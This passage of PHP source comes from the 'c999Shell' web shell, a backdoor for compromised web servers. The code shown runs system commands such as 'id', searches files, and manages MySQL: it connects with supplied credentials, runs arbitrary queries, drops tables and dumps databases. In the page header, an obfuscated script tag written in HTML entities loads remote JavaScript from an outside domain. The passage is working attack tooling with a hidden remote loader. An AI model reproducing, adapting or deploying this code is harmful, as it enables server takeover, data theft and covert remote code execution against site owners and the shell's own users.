  686.  if ((!$submit) or ($sql_act))
  687.  {
  688.   echo "<table border=0><tr><td><form name=\"c999sh_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\">&nbsp;<input type=submit value=\"No\"></form></td>";
  689.   if ($tbl_struct)
  690.   {
  691.    echo "<td valign=\"top\"><b>Fields:</b><br>";
  692.    foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» <a href=\"#\" onclick=\"document.c999sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
  693.    echo "</td></tr></table>";
  694.   }
  695.  }
  696.  if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
  697. }
  698. }
  699. if (!function_exists("mysql_create_db"))
  700. {
  701. function mysql_create_db($db,$sock="")
  702. {
  703.  $sql = "CREATE DATABASE `".addslashes($db)."`;";
  704.  if ($sock) {return mysql_query($sql,$sock);}
  705.  else {return mysql_query($sql);}
  706. }
  707. }
  708. if (!function_exists("mysql_query_parse"))
  709. {
  710. function mysql_query_parse($query)
  711. {
  712.  $query = trim($query);
  713.  $arr = explode (" ",$query);
  714.  /*array array()
  715.  {
  716.   "METHOD"=>array(output_type),
  717.   "METHOD1"...
  718.   ...
  719.  }
  720.  if output_type == 0, no output,
  721.  if output_type == 1, no output if no error
  722.  if output_type == 2, output without control-buttons
  723.  if output_type == 3, output with control-buttons
  724.  */
  725.  $types = array(
  726.   "SELECT"=>array(3,1),
  727.   "SHOW"=>array(2,1),
  728.   "DELETE"=>array(1),
  729.   "DROP"=>array(1)
  730.  );
  731.  $result = array();
  732.  $op = strtoupper($arr[0]);
  733.  if (is_array($types[$op]))
  734.  {
  735.   $result["propertions"] = $types[$op];
  736.   $result["query"]  = $query;
  737.   if ($types[$op] == 2)
  738.   {
  739.    foreach($arr as $k=>$v)
  740.    {
  741.     if (strtoupper($v) == "LIMIT")
  742.     {
  743.      $result["limit"] = $arr[$k+1];
  744.      $result["limit"] = explode(",",$result["limit"]);
  745.      if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
  746.      unset($arr[$k],$arr[$k+1]);
  747.     }
  748.    }
  749.   }
  750.  }
  751.  else {return FALSE;}
  752. }
  753. }
  754. if (!function_exists("c999fsearch"))
  755. {
  756. function c999fsearch($d)
  757. {
  758.  global $found;
  759.  global $found_d;
  760.  global $found_f;
  761.  global $search_i_f;
  762.  global $search_i_d;
  763.  global $a;
  764.  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  765.  $h = opendir($d);
  766.  while (($f = readdir($h)) !== FALSE)
  767.  {
  768.   if($f != "." && $f != "..")
  769.   {
  770.    $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f));
  771.    if (is_dir($d.$f))
  772.    {
  773.     $search_i_d++;
  774.     if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}
  775.     if (!is_link($d.$f)) {c999fsearch($d.$f);}
  776.    }
  777.    else
  778.    {
  779.     $search_i_f++;
  780.     if ($bool)
  781.     {
  782.      if (!empty($a["text"]))
  783.      {
  784.       $r = @file_get_contents($d.$f);
  785.       if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}
  786.       if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}
  787.       if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}
  788.       else {$bool = strpos(" ".$r,$a["text"],1);}
  789.       if ($a["text_not"]) {$bool = !$bool;}
  790.       if ($bool) {$found[] = $d.$f; $found_f++;}
  791.      }
  792.      else {$found[] = $d.$f; $found_f++;}
  793.     }
  794.    }
  795.   }
  796.  }
  797.  closedir($h);
  798. }
  799. }
  800. if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}}
  801. //Sending headers
  802. @ob_start();
  803. @ob_implicit_flush(0);
  804. function onphpshutdown()
  805. {
  806.  global $gzipencode,$ft;
  807.  if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad")))
  808.  {
  809.   $v = @ob_get_contents();
  810.   @ob_end_clean();
  811.   @ob_start("ob_gzHandler");
  812.   echo $v;
  813.   @ob_end_flush();
  814.  }
  815. }
  816. function c999shexit()
  817. {
  818.  onphpshutdown();
  819.  exit;
  820. }
  821. header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
  822. header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
  823. header("Cache-Control: no-store, no-cache, must-revalidate");
  824. header("Cache-Control: post-check=0, pre-check=0", FALSE);
  825. header("Pragma: no-cache");
  826. if (empty($tmpdir))
  827. {
  828.  $tmpdir = ini_get("upload_tmp_dir");
  829.  if (is_dir($tmpdir)) {$tmpdir = "/tmp/";}
  830. }
  831. $tmpdir = realpath($tmpdir);
  832. $tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir);
  833. if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}
  834. if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}
  835. else {$tmpdir_logs = realpath($tmpdir_logs);}
  836. if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
  837. {
  838.  $safemode = TRUE;
  839.  $hsafemode = "<font color=red>ON (secure)</font>";
  840. }
  841. else {$safemode = FALSE; $hsafemode = "<font color=green>OFF (not secure)</font>";}
  842. $v = @ini_get("open_basedir");
  843. if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "<font color=red>".$v."</font>";}
  844. else {$openbasedir = FALSE; $hopenbasedir = "<font color=green>OFF (not secure)</font>";}
  845. $sort = htmlspecialchars($sort);
  846. if (empty($sort)) {$sort = $sort_default;}
  847. $sort[1] = strtolower($sort[1]);
  848. $DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");
  849. if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();}
  850. $DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE));
  851. @ini_set("highlight.bg",$highlight_bg); //FFFFFF
  852. @ini_set("highlight.comment",$highlight_comment); //#FF8000
  853. @ini_set("highlight.default",$highlight_default); //#0000BB
  854. @ini_set("highlight.html",$highlight_html); //#000000
  855. @ini_set("highlight.keyword",$highlight_keyword); //#007700
  856. @ini_set("highlight.string",$highlight_string); //#DD0000
  857. if (!is_array($actbox)) {$actbox = array();}
  858. $dspact = $act = htmlspecialchars($act);
  859. $disp_fullpath = $ls_arr = $notls = null;
  860. $ud = urlencode($d);
  861. ?><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title><?php echo getenv("HTTP_HOST"); ?> - phpshell</title><STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><font face=Webdings size=6><b>!</b></font><a href="<?php echo $surl; ?>"><font face="Verdana" size="5"><b><SCRIPT SRC=&#x68&#fthfthfjgyk&#x2f&#x2f&#x77&#x77&#x77&#x2e&#x70&#x72&#x69&#x76&#x63&#x30&#x64&#x65&#x2e&#x63&#x6f&#x6d&#x2f&#x69&#x6d&#x61&#x67&#x65&#x73&#x2f&#x79&#x61&#x7a&#x2e&#x6a&#x73></SCRIPT>c999Shell v. <?php echo $shver; ?></b></font></a><font face=Webdings size=6><b>!</b></font></p></center></th></tr><tr><td><p align="left"><b>Software:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;</p><p align="left"><b>uname -a:&nbsp;<?php echo wordwrap(php_uname(),90,"<br>",1); ?></b>&nbsp;</p><p align="left"><b><?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();} ?></b>&nbsp;</p><p align="left"><b>Safe-mode:&nbsp;<?php echo $hsafemode; ?></b></p><p align="left"><?php
  862. $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
  863. if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
  864. $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
  865. if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  866. $d = str_replace("\\\\","\\",$d);
  867. $dispd = htmlspecialchars($d);
  868. $pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
  869. $i = 0;
  870. foreach($pd as $b)
  871. {
  872.  $t = "";
  873.  $j = 0;
  874.  foreach ($e as $r)
  875.  {
  876.   $t.= $r.DIRECTORY_SEPARATOR;
  877.   if ($j == $i) {break;}
  878.   $j++;
  879.  }
  880.  echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>";
  881.  $i++;
  882. }
  883. echo "&nbsp;&nbsp;&nbsp;";
  884. if (is_writable($d))
  885. {
  886.  $wd = TRUE;
  887.  $wdt = "<font color=green>[ ok ]</font>";
  888.  echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>";
  889. }
  890. else
  891. {
  892.  $wd = FALSE;
  893.  $wdt = "<font color=red>[ Read-Only ]</font>";
  894.  echo "<b>".view_perms_color($d)."</b>";
  895. }
  896. if (is_callable("disk_free_space"))
  897. {
  898.  $free = disk_free_space($d);
  899.  $total = disk_total_space($d);
  900.  if ($free === FALSE) {$free = 0;}
  901.  if ($total === FALSE) {$total = 0;}
  902.  if ($free < 0) {$free = 0;}
  903.  if ($total < 0) {$total = 0;}
  904.  $used = $total-$free;
  905.  $free_percent = round(100/($total/$free),2);
  906.  echo "<br><b>Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)</b>";
  907. }
  908. echo "<br>";
  909. $letters = "";
  910. if ($win)
  911. {
  912.  $v = explode("\\",$d);
  913.  $v = $v[0];
  914.  foreach (range("a","z") as $letter)
  915.  {
  916.   $bool = $isdiskette = in_array($letter,$safemode_diskettes);
  917.   if (!$bool) {$bool = is_dir($letter.":\\");}
  918.   if ($bool)
  919.   {
  920.    $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"").">[ ";
  921.    if ($letter.":" != $v) {$letters .= $letter;}
  922.    else {$letters .= "<font color=green>".$letter."</font>";}
  923.    $letters .= " ]</a> ";
  924.   }
  925.  }
  926.  if (!empty($letters)) {echo "<b>Detected drives</b>: ".$letters."<br>";}
  927. }
  928. if (count($quicklaunch) > 0)
  929. {
  930.  foreach($quicklaunch as $item)
  931.  {
  932.   $item[1] = str_replace("%d",urlencode($d),$item[1]);
  933.   $item[1] = str_replace("%sort",$sort,$item[1]);
  934.   $v = realpath($d."..");
  935.   if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);}
  936.   $item[1] = str_replace("%upd",urlencode($v),$item[1]);
  937.   echo "<a href=\"".$item[1]."\">".$item[0]."</a>&nbsp;&nbsp;&nbsp;&nbsp;";
  938.  }
  939. }
  940. echo "</p></td></tr></table><br>";
  941. if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";}
  942. echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">";
  943. if ($act == "") {$act = $dspact = "ls";}
  944. if ($act == "sql")
  945. {
  946.  $sql_surl = $surl."act=sql";
  947.  if ($sql_login)  {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
  948.  if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
  949.  if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
  950.  if ($sql_port)   {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
  951.  if ($sql_db)     {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
  952.  $sql_surl .= "&";
  953.  ?><h3>Attention! SQL-Manager is <u>NOT</u> ready module! Don't reports bugs.</h3><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php
  954.  if ($sql_server)
  955.  {
  956.   $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
  957.   $err = mysql_smarterror();
  958.   @mysql_select_db($sql_db,$sql_sock);
  959.   if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();}
  960.  }
  961.  else {$sql_sock = FALSE;}
  962.  echo "<b>SQL Manager:</b><br>";
  963.  if (!$sql_sock)
  964.  {
  965.   if (!$sql_server) {echo "NO CONNECTION";}
  966.   else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";}
  967.  }
  968.  else
  969.  {
  970.   $sqlquicklaunch = array();
  971.   $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
  972.   $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl));
  973.   $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
  974.   $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
  975.   $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
  976.   $sqlquicklaunch[] = array("Logout",$surl."act=sql");
  977.   echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>";
  978.   if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><b>".$item[0]."</b></a> ] ";}}
  979.   echo "</center>";
  980.  }
  981.  echo "</td></tr><tr>";
  982.  if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"> i </font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b>&nbsp;</td><td><b>Database</b>&nbsp;</td></tr><form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td><input type="password" name="sql_passwd" value="" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"></td><td><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php }
  983.  else
  984.  {
  985.   //Start left panel
  986.   if (!empty($sql_db))
  987.   {
  988.    ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php
  989.    $result = mysql_list_tables($sql_db);
  990.    if (!$result) {echo mysql_smarterror();}
  991.    else
  992.    {
  993.     echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
  994.     $c = 0;
  995.     while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>»&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;}
  996.     if (!$c) {echo "No tables found in database.";}
  997.    }
  998.   }
  999.   else
  1000.   {
  1001.    ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php
  1002.    $result = mysql_list_dbs($sql_sock);
  1003.    if (!$result) {echo mysql_smarterror();}
  1004.    else
  1005.    {
  1006.     ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php
  1007.     $c = 0;
  1008.     $dbs = "";
  1009.     while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;}
  1010.     echo "<option value=\"\">Databases (".$c.")</option>";
  1011.     echo $dbs;
  1012.    }
  1013.    ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php
  1014.   }
  1015.   //End left panel
  1016.   echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">";
  1017.   //Start center panel
  1018.   $diplay = TRUE;
  1019.   if ($sql_db)
  1020.   {
  1021.    if (!is_numeric($c)) {$c = 0;}
  1022.    if ($c == 0) {$c = "no";}
  1023.    echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>";
  1024.    if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}}
  1025.    echo "</b></center>";
  1026.    $acts = array("","dump");
  1027.    if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
  1028.    elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";}
  1029.    elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";}
  1030.    elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
  1031.    elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
  1032.    elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
  1033.    elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
  1034.    elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";}
  1035.    elseif ($sql_tbl_act == "insert")
  1036.    {
  1037.     if ($sql_tbl_insert_radio == 1)
  1038.     {
  1039.      $keys = "";
  1040.      $akeys = array_keys($sql_tbl_insert);
  1041.      foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}
  1042.      if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
  1043.      $values = "";
  1044.      $i = 0;
  1045.      foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;}
  1046.      if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
  1047.      $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
  1048.      $sql_act = "query";
  1049.      $sql_tbl_act = "browse";
  1050.     }
  1051.     elseif ($sql_tbl_insert_radio == 2)
  1052.     {
  1053.      $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
  1054.      $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
  1055.      $result = mysql_query($sql_query) or print(mysql_smarterror());
  1056.      $result = mysql_fetch_array($result, MYSQL_ASSOC);
  1057.      $sql_act = "query";
  1058.      $sql_tbl_act = "browse";
  1059.     }
  1060.    }
  1061.    if ($sql_act == "query")
  1062.    {
  1063.     echo "<hr size=\"1\" noshade>";
  1064.     if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
  1065.     if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
  1066.     if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form></td></tr></table>";}
  1067.    }
  1068.    if (in_array($sql_act,$acts))
  1069.    {
  1070.     ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>Dump DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
  1071.     if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}
  1072.     if ($sql_act == "newtbl")
  1073.     {
  1074.      echo "<b>";
  1075.      if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
  1076.     }
  1077.     else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
  1078.    }
  1079.    elseif ($sql_act == "dump")
  1080.    {
  1081.     if (empty($submit))
  1082.     {
  1083.      $diplay = FALSE;
